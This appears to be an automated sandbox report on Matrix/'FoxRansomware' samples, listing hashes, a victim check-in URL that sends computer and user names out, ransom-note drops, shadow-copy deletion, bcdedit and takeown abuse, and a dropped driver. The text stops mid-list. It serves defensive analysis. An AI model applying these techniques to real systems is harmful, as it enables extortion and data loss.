Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
141s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\106.0.5249.119\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\MEIPreload\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\FreeCell\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Music\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Videos\Sample Videos\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe HTTP URL 4 http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=UEITMFAB|Admin&sid=9Pf67WPtqzeCvwHy&phase=[ALL]4DA22BE0A5EC54A8 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Solitaire\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Mahjong\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\skins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\MF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\FreeCell\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6lxhv8bu.default-release\settings\main\ms-language-packs\browser\newtab\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ca@valencia\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\SetupMetrics\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Mahjong\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Music\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\plugins\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\More Games\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Saved Games\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 5848 bcdedit.exe 5892 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 2640 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS D22bUU4y64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" D22bUU4y64.exe -
Executes dropped EXE 64 IoCs
pid Process 2732 NWiBQzcf.exe 3936 D22bUU4y.exe 4084 D22bUU4y64.exe 2132 D22bUU4y.exe 4404 D22bUU4y.exe 3032 D22bUU4y.exe 5136 D22bUU4y.exe 2168 D22bUU4y.exe 3672 D22bUU4y.exe 5348 D22bUU4y.exe 5384 D22bUU4y.exe 5492 D22bUU4y.exe 5512 D22bUU4y.exe 2952 D22bUU4y.exe 1720 D22bUU4y.exe 5200 D22bUU4y.exe 2356 D22bUU4y.exe 1472 D22bUU4y.exe 5580 D22bUU4y.exe 2200 D22bUU4y.exe 1688 D22bUU4y.exe 2476 D22bUU4y.exe 796 D22bUU4y.exe 2276 D22bUU4y.exe 2636 D22bUU4y.exe 2452 D22bUU4y.exe 2420 D22bUU4y.exe 2168 D22bUU4y.exe 1184 D22bUU4y.exe 3496 D22bUU4y.exe 3552 D22bUU4y.exe 1692 D22bUU4y.exe 1640 D22bUU4y.exe 2332 D22bUU4y.exe 2720 D22bUU4y.exe 5676 D22bUU4y.exe 5672 D22bUU4y.exe 3360 D22bUU4y.exe 3400 D22bUU4y.exe 4744 D22bUU4y.exe 4040 D22bUU4y.exe 4504 D22bUU4y.exe 4436 D22bUU4y.exe 5552 D22bUU4y.exe 5616 D22bUU4y.exe 5596 D22bUU4y.exe 3768 D22bUU4y.exe 3168 D22bUU4y.exe 3892 D22bUU4y.exe 4160 D22bUU4y.exe 5680 D22bUU4y.exe 5788 D22bUU4y.exe 5816 D22bUU4y.exe 5956 D22bUU4y.exe 4116 D22bUU4y.exe 4216 D22bUU4y.exe 4248 D22bUU4y.exe 4276 D22bUU4y.exe 4292 D22bUU4y.exe 2468 D22bUU4y.exe 1772 D22bUU4y.exe 4616 D22bUU4y.exe 5900 D22bUU4y.exe 4792 D22bUU4y.exe -
Loads dropped DLL 64 IoCs
pid Process 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 3912 cmd.exe 3936 D22bUU4y.exe 4236 cmd.exe 2708 cmd.exe 1936 cmd.exe 5736 cmd.exe 936 cmd.exe 5172 cmd.exe 5340 cmd.exe 556 cmd.exe 5448 cmd.exe 4312 cmd.exe 2364 cmd.exe 5544 cmd.exe 5196 cmd.exe 5136 cmd.exe 1224 cmd.exe 1992 cmd.exe 5100 cmd.exe 4904 cmd.exe 2072 cmd.exe 1136 cmd.exe 1084 cmd.exe 1608 cmd.exe 2696 cmd.exe 1672 cmd.exe 3236 cmd.exe 3196 cmd.exe 3424 cmd.exe 3252 cmd.exe 1148 cmd.exe 3504 cmd.exe 3148 cmd.exe 1676 cmd.exe 4428 cmd.exe 280 cmd.exe 4564 cmd.exe 4480 cmd.exe 4736 cmd.exe 4580 cmd.exe 4508 cmd.exe 5740 cmd.exe 5240 cmd.exe 3684 cmd.exe 3716 cmd.exe 3736 cmd.exe 2412 cmd.exe 3172 cmd.exe 5748 cmd.exe 3220 cmd.exe 5720 cmd.exe 5708 cmd.exe 4584 cmd.exe 5824 cmd.exe 4208 cmd.exe 4140 cmd.exe 6132 cmd.exe 4228 cmd.exe 2280 cmd.exe 4304 cmd.exe 5880 cmd.exe 824 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 3996 takeown.exe 4732 takeown.exe 4148 takeown.exe 3976 Process not Found 5480 takeown.exe 2020 Process not Found 1532 Process not Found 2040 takeown.exe 3340 takeown.exe 3736 takeown.exe 4276 takeown.exe 3112 takeown.exe 3552 Process not Found 4712 Process not Found 2760 Process not Found 1708 takeown.exe 4932 takeown.exe 4028 takeown.exe 2184 Process not Found 4284 takeown.exe 2072 takeown.exe 1352 takeown.exe 3812 Process not Found 5544 takeown.exe 5876 takeown.exe 5616 takeown.exe 4732 Process not Found 5464 takeown.exe 4800 takeown.exe 5792 Process not Found 3240 takeown.exe 1476 takeown.exe 2240 takeown.exe 692 takeown.exe 3156 takeown.exe 2356 takeown.exe 4708 Process not Found 5148 takeown.exe 4876 takeown.exe 1824 takeown.exe 2984 takeown.exe 5512 takeown.exe 1068 takeown.exe 1996 takeown.exe 1704 takeown.exe 1652 takeown.exe 4820 takeown.exe 5988 takeown.exe 2364 takeown.exe 336 takeown.exe 5816 takeown.exe 2648 takeown.exe 1596 takeown.exe 1092 takeown.exe 1708 takeown.exe 5100 Process not Found 3004 takeown.exe 4032 takeown.exe 3696 takeown.exe 4820 takeown.exe 1580 takeown.exe 4504 takeown.exe 5220 takeown.exe 3612 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral11/files/0x0006000000016beb-1313.dat upx behavioral11/memory/3936-1353-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2132-5396-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2132-5444-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4404-5963-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3032-6796-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5136-6799-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3672-7013-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2168-6997-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5348-7743-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5384-7747-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5492-7756-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5512-7759-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2952-7768-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1720-7772-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5200-7776-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2356-7780-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1472-7786-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5580-7790-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2200-7796-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1688-7799-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2476-7805-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/796-7808-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/796-7809-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2276-7815-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2636-7824-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2452-7830-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2420-7833-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2168-7841-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1184-7845-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1184-7844-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3496-7850-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3552-7853-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3552-7852-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1692-7859-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1640-7861-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2332-7863-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2720-7870-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5676-7874-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5672-7876-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3360-7878-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3400-7880-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4744-7889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4040-7891-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4504-7895-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4436-7899-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5552-7904-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5616-7905-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5596-7911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3768-7917-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3168-7919-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3892-7922-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4160-7924-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5680-7925-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5788-7930-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5816-7931-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5956-7933-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4116-7935-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4216-7936-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4248-7939-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4276-7940-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4292-7942-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2468-7943-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5956-7946-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P8PFHBEX\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification 